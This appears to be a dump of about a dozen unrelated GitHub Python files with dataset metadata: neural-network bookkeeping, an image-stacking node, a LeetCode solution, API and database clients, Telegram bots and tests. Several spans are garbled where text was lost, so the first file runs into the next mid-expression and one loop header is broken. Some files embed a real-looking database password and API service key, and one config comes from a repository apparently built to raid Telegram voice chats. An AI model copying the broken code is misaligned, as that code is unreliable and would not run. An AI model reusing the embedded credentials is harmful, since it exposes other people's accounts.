accuracyArray FROM Models, Accuracy WHERE Models.ID = Accuracy.modelID\")\n for x in mycursor:\n print(x)\n\n def readFileData(self):\n self.savedNetworks = []\n #self.savedNetworks = [[-1]*9 for i in range(10)] #This only works for 10 models\n with open('results.txt','r') as readFile:\n \n line = readFile.readline().rstrip(\"\\n\")\n counter = 0\n \n while line:\n self.savedNetworks.append([-1]*9)\n #modelName, numHidden, epochs, mini_batch_size, eta, currentAccuracy, maxAccuracy, maxAccuracyEpoch, accuracyArray = x\n \n items = line.split(\",\")\n\n self.savedNetworks[counter][0] = items[0] #name\n self.savedNetworks[counter][1] = int(items[1]) #numHidden\n self.savedNetworks[counter][2] = int(items[2]) #epochs\n self.savedNetworks[counter][3] = int(items[3]) #mini_batch_size\n self.savedNetworks[counter][4] = float(items[4]) #eta\n self.savedNetworks[counter][5] = float(items[5]) #currentAccuracy\n self.savedNetworks[counter][6] = float(items[6]) #maxAccuracy\n self.savedNetworks[counter][7] = int(items[7]) #maxAccuracyEpoch\n self.savedNetworks[counter][8] = str(items[8]) #accuracyArray\n \n #-----WRONG ORDER-------\n # self.savedNetworks[counter][0] = items[0] #name\n # self.savedNetworks[counter][1] = float(items[1]) #current accuracy\n # self.savedNetworks[counter][2] = float(items[2]) #max accuracy\n # self.savedNetworks[counter][3] = int(items[3]) #max accuracy epoch\n # self.savedNetworks[counter][3] = items[4] #accuracy array\n # self.savedNetworks[counter][4] = int(items[5]) #numHidden\n # self.savedNetworks[counter][5] = int(items[6]) #epochs\n # self.savedNetworks[counter][6] = int(items[7]) #mini_batch_size\n # self.savedNetworks[counter][7] = float(items[8]) #eta\n \n counter = counter + 1\n\n \n line = readFile.readline().rstrip(\"\\n\")\n \n #end while\n return self.savedNetworks\n\n def insertionSort(self,arr):\n for i in range(1,len(arr)): \n currentValue = arr[i]\n pos = i\n while pos > 0 and arr[pos-1][6] 0 and self.savedNetworks[pos-1][6] 0, _ as i => i.width };\n def getHeight(img: Image | null) = match img { null => 0, _ as i => i.height };\n def getChannels(img: Image | null) {\n match img {\n null => 0,\n _ as i => match i.channels { 1 => 3, _ as c => c }\n }\n }\n\n let maxWidth = max(Input0.width, getWidth(Input1), getWidth(Input2), getWidth(Input3));\n let maxHeight = max(Input0.height, getHeight(Input1), getHeight(Input2), getHeight(Input3));\n let maxChannels = max(Input0.channels, getChannels(Input1), getChannels(Input2), getChannels(Input3));\n\n def getAdjustedWidth(img: Image | null) {\n match img {\n null => 0,\n _ as i => uint & round(i.width * maxHeight / i.height)\n }\n }\n def getAdjustedHeight(img: Image | null) {\n match img {\n null => 0,\n _ as i => uint & round(i.height * maxWidth / i.width)\n }\n }\n\n let widthSum = getAdjustedWidth(Input0) + getAdjustedWidth(Input1) + getAdjustedWidth(Input2) + getAdjustedWidth(Input3);\n let heightSum = getAdjustedHeight(Input0) + getAdjustedHeight(Input1) + getAdjustedHeight(Input2) + getAdjustedHeight(Input3);\n\n Image {\n width: match Input4 {\n Orientation::Vertical => maxWidth,\n Orientation::Horizontal => widthSum\n },\n height: match Input4 {\n Orientation::Vertical => heightSum,\n Orientation::Horizontal => maxHeight\n },\n channels: maxChannels\n }\n \"\"\"\n )\n ]\n self.category = ImageUtilityCategory\n self.name = \"Stack Images\"\n self.icon = \"CgMergeVertical\"\n self.sub = \"Compositing\"\n\n def run(\n self,\n im1: np.ndarray,\n im2: np.ndarray | None,\n im3: np.ndarray | None,\n im4: np.ndarray | None,\n orientation: Orientation,\n ) -> np.ndarray:\n img = im1\n imgs = []\n max_h, max_w, max_c = 0, 0, 1\n for img in im1, im2, im3, im4:\n if img is not None:\n h, w, c = get_h_w_c(img)\n if c == 1:\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)\n c = 3\n max_h = max(h, max_h)\n max_w = max(w, max_w)\n max_c = max(c, max_c)\n imgs.append(img)\n\n fixed_imgs: List[np.ndarray] = []\n for img in imgs:\n h, w, c = get_h_w_c(img)\n\n fixed_img = img\n # Fix images so they resize proportionally to the max image\n if orientation == Orientation.HORIZONTAL:\n if h < max_h:\n fixed_img = cv2.resize(\n img,\n (round_half_up(w * max_h / h), max_h),\n interpolation=cv2.INTER_NEAREST,\n )\n elif orientation == Orientation.VERTICAL:\n if w < max_w:\n fixed_img = cv2.resize(\n img,\n (max_w, round_half_up(h * max_w / w)),\n interpolation=cv2.INTER_NEAREST,\n )\n else:\n assert False, f\"Invalid orientation '{orientation}'\"\n\n # Expand channel dims if necessary\n if c < max_c:\n temp_img = np.ones((max_h, max_w, max_c))\n temp_img[:, :, :c] = fixed_img\n fixed_img = temp_img\n\n fixed_imgs.append(fixed_img.astype(\"float32\"))\n\n if orientation == Orientation.HORIZONTAL:\n for i in range(len(fixed_imgs)):\n assert (\n fixed_imgs[i].shape[0] == fixed_imgs[0].shape[0]\n ), \"Inputted heights are not the same and could not be auto-fixed\"\n assert (\n fixed_imgs[i].dtype == fixed_imgs[0].dtype\n ), \"The image types are not the same and could not be auto-fixed\"\n img = cv2.hconcat(fixed_imgs) # type: ignore\n elif orientation == Orientation.VERTICAL:\n for i in range(len(fixed_imgs)):\n assert (\n fixed_imgs[i].shape[1] == fixed_imgs[0].shape[1]\n ), \"Inputted widths are not the same and could not be auto-fixed\"\n assert (\n fixed_imgs[i].dtype == fixed_imgs[0].dtype\n ), \"The image types are not the same and could not be auto-fixed\"\n img = cv2.vconcat(fixed_imgs) # type: ignore\n else:\n assert False, f\"Invalid orientation '{orientation}'\"\n\n return img\n","repo_name":"orgTestCodacy11KRepos110MB/repo-1470-chaiNNer","sub_path":"backend/src/nodes/nodes/image_utility/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":6161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"18244902028","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n# Time complexity: O(2**n * 2**n) = O(2**2n)\n# Space complexity: O(2**n)\n\n\nclass Solution:\n def maxStudents(self, seats: List[List[str]]) -> int:\n m = len(seats)\n n = len(seats[0])\n valid_seats = [0] * m\n for i in range(m):\n for j in range(n):\n valid_seats[i] |= 1 << j if seats[i][j] == '.' else 0\n\n def count_bit(n):\n count = 0\n while n:\n count += n & 1\n n >>= 1\n\n return count\n\n dp = [-1] * (1 << n)\n for i in range(m):\n temp = [-1] * (1 << n)\n for j in range(valid_seats[i] + 1): # 这里也可以是 range(1<> 1) == 0: # 判断是否是一个子集,证明没有broken seat,然后判断有没有相邻的位置被占了\n if i == 0:\n temp[j] = count_bit(j) # 填第一行\n else:\n for k in range(1 << n): # k代表上一轮能走到的state, 我们从上一轮的所有state,state j能到的数\n if k & (j >> 1) == 0 and (k >> 1) & j == 0 and dp[k] != -1: # 看右上角,左上角有没有被占了,然后看k这个state上一轮能不能走到\n temp[j] = max(temp[j], dp[k] + count_bit(j))\n dp = temp\n\n return max(dp)\n\n# same idea\nfrom functools import lru_cache\n\n\nclass Solution:\n def maxStudents(self, seats: List[List[str]]) -> int:\n m = len(seats)\n n = len(seats[0])\n valid_seats = [0] * m\n for i in range(m):\n for j in range(n):\n valid_seats[i] |= 1 << j if seats[i][j] == '.' else 0\n\n def count_bit(n):\n count = 0\n while n:\n count += n & 1\n n >>= 1\n\n return count\n\n @lru_cache(None)\n def func(pre_state, row):\n if row == m:\n return 0\n res = 0\n for state in range(valid_seats[row] + 1):\n if state & valid_seats[row] == state and state & (state >> 1) == 0:\n if pre_state & (state >> 1) == 0 and (pre_state >> 1) & state == 0:\n res = max(res, count_bit(state) + func(state, row + 1))\n return res\n\n return func(0, 0)","repo_name":"zihuaweng/leetcode-solutions","sub_path":"leetcode_python/1349.Maximum_Students_Taking_Exam.py","file_name":"1349.Maximum_Students_Taking_Exam.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"32869347958","text":"# Author: Jon-Paul Boyd\n# Date: 16/01/2018\n# IMAT5118 A.I. Programming - Assignment 2\n#\nimport mysql.connector\nimport logging\nimport coloured_text as ct\nfrom constants import Constants\n\n\nclass Database:\n \"\"\"Represent the database\"\"\"\n def __init__(self):\n self.user = 'imat5118'\n self.password = 'imat5118password'\n self.host = '127.0.0.1'\n self.database = 'sakila'\n self.connection = mysql.connector.connect(\n user=self.user,\n password=self.password,\n host=self.host,\n database=self.database)\n self.cursor = self.connection.cursor()\n logging.info(\"Database initialised\")\n\n def execute_query(self, sqlquery):\n \"\"\"Execute SQL query\"\"\"\n logging.info(\"Executing query: {}\".format(sqlquery))\n self.cursor.execute(sqlquery)\n\n def output_results(self, cursor):\n row_idx = 0\n constants = Constants()\n\n for row in cursor:\n row_idx += 1\n col_idx = 0\n for column in row:\n if col_idx % 2 == 0: # Column values in alternating colours to aid readability in shell\n print(ct.Fore.YELLOW, end='')\n print(column, end='')\n print(\" \" + ct.Formatting.RESET_ALL, end='')\n else:\n print(ct.Fore.WHITE, end='')\n print(column, end='')\n print(\" \" + ct.Formatting.RESET_ALL, end='')\n col_idx += 1\n\n print(\"\") # newline as end of row reached\n\n if row_idx == 0:\n print(ct.Fore.MAGENTA + ct.Formatting.BOLD + constants.nothing_found + ct.Formatting.RESET_ALL)\n\n def cursor_close(self):\n self.cursor.close()\n\n def connection_close(self):\n self.connection.close()\n logging.info(\"Database connection closed\")\n","repo_name":"corticalstack/NLPPythonToSQL","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"7815898459","text":"import pandas as pd\nimport requests\nimport time as tm\nimport csv\nfrom google.cloud import storage\nclient = storage.Client\nfrom datetime import date\n### Working with GOOGLE\n# Retrieve an existing bucket\n# https://console.cloud.google.com/storage/browser/dejon-data-bucket\nbucket = client.get_bucket('bucket-id')\n# Then do other things...\nblob = bucket.get_blob('remote/path/to/file.txt')\nprint(blob.download_as_bytes())\nblob.upload_from_string('New contents!')\n\n\n###\ntodays_date = date.today()\nyear = date.year\nmonth = date.month\ndef waterMeasuring(year = 2013, month = \"06\"):\n current_year = year\n current_month = month\n pageNo=1\n numOfRows=1000\n resultType=\"JSON\"\n ptNoList=[\"3008A40\", \"2012F50\"]\n wmyrList=[current_year]\n wmodList=[current_month]\n # wmyrList=[\"2012\", \"2013\", \"2014\", \"2015\", \"2016\", \"2017\",\"2018\",\"2019\", \"2020\", \"2021\", \"2022\"]\n # wmodList=[\"01\",\"02\",\"03\", \"04\",\"05\",\"06\",\"07\",\"08\",\"09\",\"10\",\"11\",\"12\"]\n\n #### Parameters Values\n Payload = {\n \"serviceKey\" : \"/S1CuHzopeMWDtsc2q26Ezp5Vgpgf2XGBYzYZehUCBgBQpHaZ+GvLIbar8Q+MT7zAliK60Rzoj9kEDMZlIhI4Q==\",\n \"pageNo\" : pageNo,\n \"numOfRows\" : numOfRows,\n \"resultType\" : resultType,\n \"ptNoList\" : ptNoList,\n \"wmyrList\": wmyrList ,\n \"wmodList\" : wmodList\n }\n\n base_url = \"http://apis.data.go.kr/1480523/WaterQualityService\"\n # function = \"/getRealTimeWaterQualityList\"\n function = \"/getWaterMeasuringList\"\n get_url = base_url + function\n\n\n def access_api(function, params):\n print(\"Getting results...\")\n target = base_url + function\n r = requests.get(target, params).json()\n tm.sleep(2)\n res = r['getWaterMeasuringList']\n return res['item']\n\n\n for item in range(0, len(ptNoList)):\n for i in range(0, len(wmyrList)):\n for j in range(0, len(wmodList)):\n print(\"TARGET: \", ptNoList[item], \"YEAR: = \", wmyrList[i], \"MONTH: \", wmodList[j])\n data_file = open(\"WaterMeasuringList.csv\", 'a')\n Payload = {\n \"serviceKey\": \"/S1CuHzopeMWDtsc2q26Ezp5Vgpgf2XGBYzYZehUCBgBQpHaZ+GvLIbar8Q+MT7zAliK60Rzoj9kEDMZlIhI4Q==\",\n \"pageNo\": pageNo,\n \"numOfRows\": numOfRows,\n \"resultType\": resultType,\n \"ptNoList\": ptNoList[item],\n \"wmyrList\": wmyrList[i],\n \"wmodList\": wmodList[j]\n }\n # API ACCESS FUNCTIONS ###\n\n data = access_api(function, params=Payload)\n\n csv_writer = csv.writer(data_file)\n count = 0\n\n for row in data:\n if count == 0:\n # header = row.keys()\n # csv_writer.writerow(header)\n count += 1\n csv_writer.writerow(row.values())\n\n data_file.close()\n ### Main program\n return \"Done\"\n\n\nwaterMeasuring()\n","repo_name":"BatbayarEnkhbaatar/airflow_dags","sub_path":"dags/getWaterMeasuringList.py","file_name":"getWaterMeasuringList.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28122275222","text":"import numpy as np\r\nimport re\r\n\r\n#加载词典\r\ndef loadDic( infile ):\r\n input_file = open(infile, mode='r',encoding='utf-8')\r\n\r\n infile_content = input_file.readlines()\r\n list_word = []\r\n for each in infile_content:\r\n list_temp = each.split('\\uf8f5')\r\n word = list_temp[0]\r\n meaning = ''\r\n for i in range(1,len(list_temp)-1):\r\n meaning += ' ' + list_temp[i]\r\n list_word.append([word,meaning])\r\n #print(list_word)\r\n dict_temp = dict(list_word)\r\n #print(dict_temp)\r\n input_file.close()\r\n return dict_temp\r\n\r\n#词型还原\r\ndef trans( word:str ):\r\n re1 = re.compile(r'(\\w+)s(\\W)*',flags=re.I) #none transfrom\r\n re2 = re.compile(r'(\\w+)es(\\W)*',flags=re.I)\r\n re3 = re.compile(r'(\\w+)ies(\\W)*',flags=re.I)\r\n re4 = re.compile(r'(\\w+)ves(\\W)*',flags=re.I)\r\n\r\n re5 = re.compile(r'(\\w+)ies',flags=re.I)#verb\r\n re6 = re.compile(r'(\\w+)es',flags=re.I)\r\n re7 = re.compile(r'(\\w+)s', flags=re.I)\r\n re8 = re.compile(r'(\\w+)'+word[len(word)-4]+'{2}ing(\\W)*',flags=re.I)#结尾双写加ing\r\n re9 = re.compile(r'(\\w+)ying(\\W)*',flags=re.I)\r\n re10 = re.compile(r'(\\w+)ing(\\W)*', flags=re.I)\r\n re11 = re.compile(r'(\\w+)'+word[len(word)-4]+'{2}ed(\\W)*',flags=re.I)\r\n re12 = re.compile(r'(\\w+)ied(\\W)*',flags=re.I)\r\n re13 = re.compile('(\\w+)ed(\\W)*',flags=re.I)\r\n res = []\r\n if re.search(re3,word):\r\n res.append(re.sub(r'ies',r'y',word))\r\n elif re.search(re4,word):\r\n res.append(re.sub(r'ves',r'f',word))\r\n res.append(re.sub(r'ves',r'fe', word))\r\n elif re.search(re2,word):\r\n res.append(re.sub(r'es',r'',word))\r\n res.append(re.sub(r'es',r'e',word))\r\n elif re.search(re1,word):\r\n res.append(re.sub(r's',r'',word))\r\n '''\r\n if re.search(re5,word):\r\n res.append(re.sub(r'ies',r'y',word))\r\n elif re.search(re6,word):\r\n res.append(re.sub(r'es',r'',word))\r\n elif re.search(re7,word):\r\n res.append(re.sub(r's',r'',word))\r\n '''\r\n elif re.search(re8,word):\r\n res.append(re.sub(r''+word[len(word) - 4] + '{2}ing', r''+word[len(word) - 4],word))\r\n elif re.search(re9,word):\r\n res.append(re.sub(r'ying',r'ie',word))\r\n elif re.search(re10,word):\r\n res.append(re.sub(r'ing',r'',word))\r\n res.append(re.sub(r'ing',r'e',word))\r\n elif re.search(re11, word):\r\n res.append(re.sub(r''+word[len(word) - 4] + '{2}ed', r''+word[len(word) - 4],word))\r\n elif re.search(re12, word):\r\n res.append(re.sub(r'ied',r'y',word))\r\n elif re.search(re13, word):\r\n res.append(re.sub(r'ed',r'',word))\r\n res.append(re.sub(r'ed',r'e',word))\r\n return res\r\n\r\n#没有匹配的词语\r\ndef NoMatch( outfile, word ):\r\n file_handle = open(outfile, 'a', encoding='utf-8')\r\n file_handle.write(word + '\\n')\r\n\r\n#不规则的词语\r\ndef irregular( ir_file , word:str ):\r\n input_file = open( ir_file, mode='r', encoding='utf-8')\r\n infile_content = input_file.readlines()\r\n for each in infile_content:\r\n list_word = each.split('\\t')\r\n for i in range( len(list_word) ):\r\n if list_word[i].strip() == word:\r\n return list_word[0]\r\n return 'no match'\r\n\r\n\r\nif __name__ == \"__main__\":\r\n '''\r\n b = \"book\"\r\n a = \"lifes\"\r\n c = \"shopping\"\r\n d = \"cooked\"\r\n print( trans(a) )\r\n print( trans(b) )\r\n print(trans(c))\r\n print(trans(d))\r\n '''\r\n # print (irregular('C:\\\\Users\\\\zhc\\\\Documents\\\\nlp\\\\dic_ec\\\\irregular.txt','dug'))\r\n dict = loadDic('C:\\\\Users\\\\zhc\\\\Documents\\\\nlp\\\\dic_ec\\\\dic_ec.txt')\r\n while( True ):\r\n word = input('请输入要查询的单词:')\r\n if word == 'q':\r\n print('查询结束,欢迎使用')\r\n break\r\n ifMatch = False\r\n if word in dict.keys():\r\n ifMatch = True\r\n print(word,dict[word])\r\n word_list = trans(word)\r\n if word_list!= []:\r\n for i in range(len(word_list)):\r\n word_temp = word_list[i]\r\n if word_temp in dict.keys():\r\n ifMatch = True\r\n print(word_temp, dict[word_temp])\r\n word_ir = irregular('C:\\\\Users\\\\zhc\\\\Documents\\\\nlp\\\\dic_ec\\\\irregular.txt',word)\r\n if word_ir != 'no match' and word_ir in dict.keys():\r\n print(word_ir,dict[word_ir])\r\n ifMatch = True\r\n if ifMatch == False:\r\n print('输入的单词不存在,已加入NoMatchList.txt!')\r\n NoMatch('C:\\\\Users\\\\zhc\\\\Documents\\\\nlp\\\\dic_ec\\\\NoMatchList.txt',word)\r\n","repo_name":"abbycc/course","sub_path":"nlp/zhc_Lemmatization.py","file_name":"zhc_Lemmatization.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"10951367689","text":"import os\nimport os.path\nimport subprocess\nimport tempfile\nimport unittest\n\nfrom drgn import Program\nfrom tests import TestCase\n\n\nclass TestLive(TestCase):\n @classmethod\n def setUpClass(cls):\n cls.prog = Program()\n cls.prog.set_pid(os.getpid())\n\n def test_threads(self):\n tids = [thread.tid for thread in self.prog.threads()]\n self.assertIn(os.getpid(), tids)\n for tid in tids:\n self.assertEqual(self.prog.thread(tid).tid, tid)\n\n def test_thread_not_found(self):\n self.assertRaises(LookupError, self.prog.thread, 1)\n\n def test_main_thread(self):\n self.assertEqual(self.prog.main_thread().tid, os.getpid())\n\n def test_crashed_thread(self):\n self.assertRaisesRegex(\n ValueError,\n \"crashed thread is only defined for core dumps\",\n self.prog.crashed_thread,\n )\n\n\nclass TestCoreDump(TestCase):\n TIDS = (\n 2265413,\n 2265414,\n 2265415,\n 2265416,\n 2265417,\n 2265418,\n 2265419,\n 2265420,\n 2265421,\n 2265422,\n 2265423,\n 2265424,\n 2265425,\n )\n\n MAIN_TID = 2265413\n CRASHED_TID = 2265419\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n with tempfile.NamedTemporaryFile() as core_dump_file:\n try:\n subprocess.check_call(\n [\n \"zstd\",\n \"--quiet\",\n \"--force\",\n \"--decompress\",\n \"--stdout\",\n os.path.join(os.path.dirname(__file__), \"sample.coredump.zst\"),\n ],\n stdout=core_dump_file,\n )\n except FileNotFoundError:\n raise unittest.SkipTest(\"zstd not found\")\n cls.prog = Program()\n cls.prog.set_core_dump(core_dump_file.name)\n\n def test_threads(self):\n self.assertSequenceEqual(\n sorted(thread.tid for thread in self.prog.threads()),\n self.TIDS,\n )\n\n def test_thread(self):\n for tid in self.TIDS:\n self.assertEqual(self.prog.thread(tid).tid, tid)\n\n def test_thread_not_found(self):\n self.assertRaises(LookupError, self.prog.thread, 99)\n\n def test_main_thread(self):\n self.assertEqual(self.prog.main_thread().tid, self.MAIN_TID)\n\n def test_crashed_thread(self):\n self.assertEqual(self.prog.crashed_thread().tid, self.CRASHED_TID)\n","repo_name":"osandov/drgn","sub_path":"tests/test_thread.py","file_name":"test_thread.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":1531,"dataset":"github-code","pt":"47"} +{"seq_id":"17766377846","text":"# ArrayCore - © Noob \n\nimport asyncio\nimport os\nimport sys\nimport time\n\nfrom dotenv import load_dotenv\nfrom pyrogram import Client, filters\nfrom pytgcalls import PyTgCalls\n\n\nif os.path.exists(\".env\"):\n load_dotenv(\".env\")\n \n__version__ = \"v0.0.1\"\n\n# -------------CONFIGS--------------------\nAPI_ID = int(os.getenv(\"API_ID\", \"\"))\nAPI_HASH = os.getenv(\"API_HASH\", \"\")\nALIVE_PIC = os.getenv(\"ALIVE_PIC\", \"\")\nBOT_TOKEN = os.getenv(\"BOT_TOKEN\", None)\nSESSION = os.getenv(\"SESSION\", None)\nGROUP_MODE = os.getenv(\"GROUP_MODE\", \"True\")\nSTART_VID = os.getenv(\"START_VID\", None)\n\n\ndef make_int(str_input):\n str_list = str_input.split(\" \")\n int_list = []\n for x in str_list:\n int_list.append(int(x))\n return int_list\n\n\nsudo = os.getenv(\"SUDO_USERS\")\nSUDO_USERS = []\nif sudo:\n SUDO_USERS = make_int(sudo)\nDEVS = [5195361852, 5166466565]\nfor x in DEVS:\n SUDO_USERS.append(x)\n\n\n# SUDO_USERS = list(filter(lambda x: x, map(int, os.getenv(\"SUDO_USERS\", \"5195361852 5166466565 \").split())))\n#----------------------------------------------\n\nvcbot = Client(\n 'ArrayCore',\n api_id=API_ID,\n api_hash=API_HASH,\n bot_token=BOT_TOKEN,\n plugins={'root': 'ArrayCore.Plugin'},\n)\n\nHELP_DICT = dict()\nhl = HNDLR[0]\nstart_time = time.time()\n\n\nif GROUP_MODE == (\"True\" or \"true\" or \"TRUE\"):\n grp = True\nelse:\n grp = False\n\n\n#-------------------------CLIENTS-----------------------------\nif SESSION:\n Venom = Client(SESSION, api_id=API_ID, api_hash=API_HASH, plugins={'root': 'ArrayCore.vc'})\n call_py = PyTgCalls(Venom1)\nelse:\n Venom = None\n call_py = None\n","repo_name":"Mass-Action/vc-raid","sub_path":"ArrayCore/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"4713246925","text":"import logging\nimport ConfigParser\nfrom database import Sensor\n\n__author__ = 'Jan Hajnar'\n__date__ = '19.7.2014'\n__license__ = 'GPL'\n\nlogger = logging.getLogger(__name__)\n\n\nclass AppConfig(object):\n def __init__(self):\n self.port = None\n self.temp_sensors = {}\n self.check_period = None\n\n def load_config(self, path):\n config_parser = ConfigParser.RawConfigParser()\n config_parser.read(path)\n try:\n self.port = config_parser.getint(\"webapp\", \"port\")\n temp_sensors = config_parser.get(\"sensors\", \"temp_sensors\")\n for temp_sensor in temp_sensors.split(\"\\n\"):\n sensor_parameters = temp_sensor.split(\",\")\n self.temp_sensors[sensor_parameters[0]] = Sensor(sensor_parameters[0],\n sensor_parameters[1], sensor_parameters[2])\n self.check_period = config_parser.getint(\"sensors\", \"check_period_mins\")\n except ConfigParser.Error:\n logger.exception(\"Error occurred during parsing of configuration file\")\n","repo_name":"DzonyKalafut/raspberry-temp","sub_path":"app_config.py","file_name":"app_config.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40844433917","text":"import unittest\n\nfrom kafka.errors import (\n KafkaError,\n)\n\nfrom minos.common import (\n Config,\n)\nfrom minos.plugins.kafka import (\n KafkaBrokerBuilderMixin,\n KafkaCircuitBreakerMixin,\n)\nfrom tests.utils import (\n CONFIG_FILE_PATH,\n)\n\n\nclass TestKafkaCircuitBreakerMixin(unittest.IsolatedAsyncioTestCase):\n def test_constructor(self):\n mixin = KafkaCircuitBreakerMixin()\n self.assertEqual((KafkaError,), mixin.circuit_breaker_exceptions)\n\n\nclass TestKafkaBrokerBuilderMixin(unittest.IsolatedAsyncioTestCase):\n def test_constructor(self):\n mixin = KafkaBrokerBuilderMixin()\n\n config = Config(CONFIG_FILE_PATH)\n mixin.with_config(config)\n\n common_config = config.get_interface_by_name(\"broker\")[\"common\"]\n\n expected = {\n \"group_id\": config.get_name(),\n \"host\": common_config[\"host\"],\n \"port\": common_config[\"port\"],\n }\n self.assertEqual(expected, mixin.kwargs)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"minos-framework/minos-python","sub_path":"packages/plugins/minos-broker-kafka/tests/test_kafka/test_common.py","file_name":"test_common.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":433,"dataset":"github-code","pt":"47"} +{"seq_id":"17558841738","text":"from pyjamas_core import Supermodel\nfrom pyjamas_core.util import Input, Output, Property\nfrom geopy.distance import geodesic\nimport numpy as np\n\n# define the model class and inherit from class \"Supermodel\"\nclass Model(Supermodel):\n # model constructor\n def __init__(self, model_id, name: str):\n # instantiate supermodel\n super(Model, self).__init__(model_id, name)\n\n # define inputs\n self.inputs['KWData'] = Input(name='Power Plant', unit='-', info='European Power Plant')\n self.inputs['Locations'] = Input(name='Locations', unit='-', info='Locations with geographical coordinates')\n\n # define outputs\n self.outputs['DistanceFactor'] = Output(name='DistanceFactor', unit='[€/km*MWh]', info='Distance factor')\n\n # define properties\n self.properties['NetworkCost'] = Property(default=148E9, data_type=float, name='Network cost', unit='€',\n info=\"Network cost * annual amount of energy\", example='148*10^9 € (Mittelspannung, Churwalden 2017)')\n\n # define persistent variables\n self.NetworkCost = None\n\n async def func_amend(self, keys=[]):\n if 'NetworkCost' in keys:\n self.NetworkCost = self.get_property('NetworkCost')\n\n async def func_peri(self, prep_to_peri=None):\n # inputs\n KW_data = await self.get_input('KWData')\n locations = await self.get_input('Locations')\n\n # calculate distance factor\n DistanceFactor = {'location': {}, 'dist_factor': {}}\n dist_factor = []\n\n # - loop over locations\n for it in range(0, len(locations['dist_networks'])):\n loc_lat_i = locations['Latitude'][it]\n loc_long_i = locations['Longitude'][it]\n\n # distance in meter between location of SPG and KW\n dist_KW = [geodesic((loc_lat_i, loc_long_i), (KW_data['lat'][jt], KW_data['long'][jt])).m for jt in range(0, len(KW_data['id']))]\n\n # distance times power of KW\n dist_power = np.array(dist_KW) * np.array(KW_data['p_inst'])\n dist_power_sum = np.sum(dist_power)\n # - annual (assume 8760 h = 1 year)\n dist_power_sum = dist_power_sum*8760\n\n # distance factor\n dist_factor_i = self.NetworkCost/dist_power_sum # €/(m*W)\n # - change unit from €/(m*W) to €/(km*MWh)\n dist_factor_i = dist_factor_i*1E9\n # append in list\n dist_factor.append(dist_factor_i)\n\n\n # set output\n DistanceFactor['location'] = locations['dist_networks']\n DistanceFactor['dist_factor'] = dist_factor\n self.set_output(\"DistanceFactor\", DistanceFactor)\n","repo_name":"schmocker/Pyjamas","sub_path":"Models/ExpensesCalculations/DistanceFactor/V001/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"29936454325","text":"import handlers.refill\n\nfrom aiogram import Dispatcher, types\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import StatesGroup, State\nfrom aiogram.utils.exceptions import MessageToDeleteNotFound\n\nfrom database import users, thedex_db\nfrom demo import dm_inline, dm_database\nfrom handlers.refill_500 import smalluser_check\nfrom keyboards import inline\nfrom binance import thedex\n\n\nclass DemoStabPoolUser(StatesGroup):\n hold = State()\n amount = State()\n currency = State()\n finish = State()\n\n\nasync def registration_500(call: types.CallbackQuery):\n rows = await thedex_db.get_transaction(call.from_user.id)\n language = await users.user_data(call.from_user.id)\n await dm_database.get_balance_stabpool(call.from_user.id)\n sum_refill = 0\n try:\n await call.message.delete()\n except MessageToDeleteNotFound:\n pass\n if not rows:\n if sum_refill >= 20000:\n text = await users.get_text(\"Стабпул ошибка #1\", language[4])\n await call.answer(text, show_alert=True)\n await handlers.refill.handle_deposit_funds(call)\n else:\n text = await users.get_text(\"Стабпул пополнение\", language[4])\n text = text.replace('{сумма}', f'{20000 - sum_refill}')\n dep_msg = await call.message.answer(text, reply_markup=dm_inline.back_menu(language[4]))\n await DemoStabPoolUser.amount.set()\n state = Dispatcher.get_current().current_state()\n await state.update_data({\"dep_msg\": dep_msg.message_id})\n if len(rows) == 1:\n row = rows[0]\n await smalluser_check(call, row)\n if len(rows) > 1:\n text = await users.get_text(\"Ошибка пополнения #5\", language[4])\n await call.message.answer(text)\n\n\nasync def back_menu(call: types.CallbackQuery, state: FSMContext):\n await state.finish()\n language = await users.user_data(call.from_user.id)\n text = 'Выберите один из вариантов:'\n if language[4] == \"EN\":\n text = 'Select at least one option:'\n await call.message.delete()\n await call.message.answer(text, reply_markup=dm_inline.dm_refill_account_2(language[4]))\n\n\nasync def smalluser_step1(msg: types.Message, state: FSMContext):\n async with state.proxy() as data:\n try:\n await msg.bot.delete_message(chat_id=msg.from_id,\n message_id=data.get('dep_msg'))\n await msg.delete()\n except MessageToDeleteNotFound:\n pass\n language = await users.user_data(msg.from_user.id)\n sum_refill = 0\n if msg.text.isdigit():\n if 1000 <= int(msg.text) <= (20000 - sum_refill):\n summary = int(msg.text)\n response = await thedex.create_invoice(summary, msg.from_id, \"[DEMO] Стабилизационный пул\")\n await state.update_data({'status': 500, 'amount': int(msg.text), 'invoiceId': response})\n text = await users.get_text(\"Выбор сети пополнения\", language[4])\n await msg.answer(text, reply_markup=inline.return_currencies())\n await DemoStabPoolUser.next()\n elif int(msg.text) > 20000:\n text = await users.get_text(\"Стабпул ошибка #2\", language[4])\n text = text.replace('{сумма}', f'{20000 - sum_refill}')\n dep_msg = await msg.answer(text)\n await 